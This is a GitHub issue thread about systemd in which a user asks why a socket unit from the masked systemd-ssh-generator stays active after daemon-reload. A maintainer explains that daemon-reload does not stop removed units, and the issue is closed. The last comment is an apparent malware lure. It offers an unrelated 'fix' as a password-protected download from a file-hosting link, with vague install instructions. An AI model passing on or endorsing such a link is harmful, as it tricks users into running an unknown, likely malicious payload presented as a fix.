### ISSUE TITLE
`systemctl daemon-reload` leaves socket from generator unit in active but dead state

### ISSUE THREAD

**Issue by calestyo** [systemd/systemd#34201]
### systemd version the issue has been seen with

256

### CPU architectures issue was seen on

None

### Expected behaviour you didn't see

Hey.

Not sure whether this is a bug or actually by design, so consider it a heads-up and just close in case of the latter.

By coincidence I've noticed the newish `systemd-ssh-generator` and friends, which I'm not so sure whether I should like it or not (for security reasons).

So for starters I was looking into a way how to get rid of it O:-) until I've decided whether it should be there (on my systems - I do of course see the benefits it may have for VMs/etc) or not.

The cleanest solution I've found for that is masking the generator as described in `systemd.generator(7)`, so I've masked it did `daemon-reload` and then, by the documentation from that manpage:
>       After installing new generators or updating the configuration, systemctl
>       daemon-reload may be executed. This will delete the previous
>       configuration created by generators, re-run all generators, and cause
>       systemd to reload units from disk. See systemctl(1) for more
>       information.

expected all should be gone, by then.

Indeed, the socket was gone, but the unit seems to remain in limbo.
```
● sshd-unix-local.socket
     Loaded: not-found (Reason: Unit sshd-unix-local.socket not found.)
     Active: active (listening) since Fri 2024-08-30 02:20:17 CEST; 1 day 3h ago
 Invocation: 97f1068fffc04465ae12915fc1f9a4ff
     CGroup: /system.slice/sshd-unix-local.socket

Aug 30 02:20:17 heisenberg systemd[1]: Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
Aug 31 05:47:02 heisenberg systemd[1]: sshd-unix-local.socket: Socket unit configuration has changed while unit has been running, no open socket file descriptor left. The socket unit is not>
```
I.e. it (the unit) **is** gone, but the socket is also still considered still considered active (despite the file actually gone).

Not sure whether that makes any sense :-)

Cheers,
Chris.

**Comment by calestyo** [comment]
Something's wrong in my description:

Namely the socket file is **not** gone, after reloading with the masked generator. It even doesn't seem to disappear when `stop`ping the .socket unit.

**Comment by yuwata** [comment]
daemon-reload does neither stop removed units, nor start newly generated units, nor restart updated units.
So, the behavior is expected.

**Comment by yuwata** [comment]
Even if it is manually stopped, some units may still reference the socket unit. In such case, the unit is still shown by systemctl.

**Comment by calestyo** [comment]
Thanks.

And does then even the `Socket unit configuration has changed while unit has been running, no open socket file descriptor left.` message make sense?

Anyway, closing this.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
